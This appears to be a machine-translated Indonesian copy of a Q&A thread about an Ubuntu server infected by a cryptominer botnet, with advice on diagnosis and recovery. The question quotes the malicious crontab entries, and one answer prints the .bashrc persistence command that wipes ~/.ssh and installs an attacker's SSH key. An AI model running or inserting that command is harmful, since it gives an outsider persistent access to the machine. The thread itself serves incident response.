Strange Cron Job membutuhkan 100% dari CPU Ubuntu 18 LTS Server

21

Saya terus mendapatkan pekerjaan cron weir muncul dan saya tidak tahu apa yang mereka lakukan. Saya biasanya mengeluarkan kill -9 untuk menghentikannya. Mereka mengambil 100% CPU saya dan dapat berjalan selama berhari-hari sampai saya periksa. Adakah yang tahu apa artinya ini?

sudo crontab -l
0 0 */3 * * /root/.firefoxcatche/a/upd>/dev/null 2>&1
@reboot /root/.firefoxcatche/a/upd>/dev/null 2>&1
5 8 * * 0 /root/.firefoxcatche/b/sync>/dev/null 2>&1
@reboot /root/.firefoxcatche/b/sync>/dev/null 2>&1
#5 1 * * * /tmp/.X13-unix/.rsync/c/aptitude>/dev/null 2>&1

Saya menjalankan server Ubuntu 18 LTS sepenuhnya diperbarui pada kemarin 7/24/2019

MEMPERBARUI

Saya menghargai semua umpan balik. Saya telah memutus semua drive data dan aplikasi karena satu-satunya hal yang terpengaruh adalah drive OS, saya setidaknya melakukan hal semacam itu dengan benar. Saya akan kembali dengan membangun kembali, dengan lebih banyak keamanan dan metode yang lebih aman.

MCP_infiltrator
sumber
8
.firefoxcatchemungkin tidak ada hubungannya dengan firefox - mungkinkah ini penambang bitcoin? Coba unggah file yang dapat dieksekusi ke virustotal.
Thom Wiggers
1
File-file yang dijalankan oleh crontab itu adalah /root/.firefoxcatche/a/upddan/root/.firefoxcatche/b/sync
Thom Wiggers
2
"Aku tidak bisa menemukan crontab untuk memotongnya" apa artinya? mengapa sudo crontab -epengeditan tidak bekerja? Tetapi jika ini adalah cryptominer yang tidak Anda instal ... itu akan ditambahkan kembali. Penampilan pertama di "/root/.firefoxcatche/a/upd" apa fungsinya.
Rinzwind
2
"Apakah saya harus masuk sebagai root untuk sampai ke sana?" Ini adalah pertanyaan yang tidak saya harapkan dari administrator. Anda benar-benar perlu tahu apa yang Anda lakukan mulai sekarang. Ubah kata sandi admin ASAP. Periksa file yang terdaftar di cron. Membasmi mereka.
Rinzwind
1
tapi sesederhana itu ;-) Saya memelihara 10+ contoh google cloud. Dengan rencana darurat pada apa pun yang saya bisa bayangkan salah. Jika sesuatu seperti ini akan terjadi, saya akan menghancurkan instance root, membuat yang baru, memindai data disk terhadap klon, memindai perbedaan dan kemudian melampirkannya ke instance. dan mengimplementasikan sesuatu untuk menjebak orang ini agar tidak terjadi lagi. Dalam kasus saya, gaji saya tergantung padanya ;-)
Rinzwind

Jawaban:

40

Mesin Anda kemungkinan besar memiliki infeksi penambang crypto. Anda dapat melihat orang lain melaporkan nama file dan perilaku yang serupa di deteksi kehidupan nyata mesin virtual di Azure dengan Pusat Keamanan . Lihat juga Server Ubuntu saya memiliki virus ... Saya sudah menemukannya tetapi saya tidak bisa menyingkirkannya ... di Reddit.

Anda tidak dapat lagi mempercayai mesin itu, dan harus menginstalnya kembali. Hati-hati dengan mengembalikan cadangan.

Thom Wiggers
sumber
8
Saya setuju. root password dikompromikan jadi instal ulang dan sangat berhati-hati dengan cadangan; bisa juga di sana.
Rinzwind
9

Mesin Anda telah terinfeksi dengan serangan penambang crypto. Saya juga menghadapi serangan ransomware serupa di masa lalu dan database saya terganggu. Saya mengambil dump SQL untuk mesin dan reprovisioned mesin (karena mesin saya adalah VM yang di-host di AWS EC2). Saya juga memodifikasi grup keamanan mesin untuk mengunci akses SSH dan kata sandi yang dimodifikasi. Saya juga mengaktifkan pencatatan log ke kueri dan ekspor ke S3 setiap malam.

beingadityak
sumber
4

Hal yang sama terjadi pada saya, dan saya perhatikan kemarin. Saya memeriksa file /var/log/syslogdan IP ini (185.234.218.40) tampaknya secara otomatis menjalankan cronjobs.

Saya memeriksanya di http://whatismyipaddress.com ( https://whatismyipaddress.com/ip/185.234.218.40 ) dan memiliki beberapa laporan. File-file ini diedit oleh trojan:

  • .bashrc
  • .ssh / berwenang_kunci

Saya menemukan ini di akhir .bashrc(yang dijalankan setiap kali bash dibuka):

set +o history
export PATH=/home/user/.bin:$PATH
cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod 700 .ssh && cd .ssh && chmod 600 authorized_keys && cd ~

Ini menghapus authorized_keysfile Anda , yang merupakan daftar kunci SSH yang diizinkan untuk terhubung tanpa kata sandi. Kemudian, itu menambahkan kunci SSH penyerang:

ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr

Selanjutnya, saya menemukan folder ini:, di /tmp/.X13-unix/.rsyncmana semua malware. Saya bahkan menemukan file,, /tmp/.X13-unix/.rsync/c/ipfile yang berisi 70.000 alamat IP, yang kemungkinan besar adalah korban atau server simpul lainnya.

Ada 2 solusi: A:

  • Tambahkan firewall yang memblokir semua koneksi keluar kecuali port 22 dan lainnya yang Anda anggap perlu dan aktifkan fail2ban, sebuah program yang melarang alamat IP setelah X upaya password gagal

  • Bunuh semua pekerjaan cron:, ps aux | grep cronlalu bunuh PID yang muncul

  • Ubah kata sandi Anda menjadi kata sandi yang aman

B:

  • Cadangkan semua file atau folder yang Anda butuhkan atau inginkan

  • Setel ulang server dan instal ulang Ubuntu, atau langsung buat tetesan baru

    Seperti yang dikatakan Thom Wiggers, Anda tentu saja bagian dari botnet penambangan bitcoin, dan server Anda memiliki pintu belakang . Backdoor menggunakan eksploitasi perl, sebuah file yang terletak di sini /tmp/.X13-unix/.rsync/b/run:, mengandung ini ( https://pastebin.com/ceP2jsUy )

Folder yang paling mencurigakan yang saya temukan adalah:

  • /tmp/.X13-unix/.rsync

  • ~/.bashrc (yang telah diedit)

  • ~/.firefoxcatche

Akhirnya, ada sebuah artikel yang berhubungan dengan Perl Backdoor di sini: https://blog.trendmicro.com/trendlabs-security-intelligence/outlaw-hacking-groups-botnet-observed-spreading-miner-perl-based-backdoor/

Saya harap Anda menemukan ini berguna.

Oqhax
sumber
Saya menghapus os drive dan menginstal ulang Ubuntu menciptakan kata sandi baru yang agak panjang dan kunci ssh baru
MCP_infiltrator
Ya, itu solusi yang bagus :)
Oqhax
Ini adalah jawaban yang sangat membantu - terima kasih untuk mengetahui fakta yang ~/.bashrctelah diedit. Saya menemukan bahwa untuk membunuh palsu rsyncsaya harus mengeluarkan kill -9 <pid>.
Benny Hill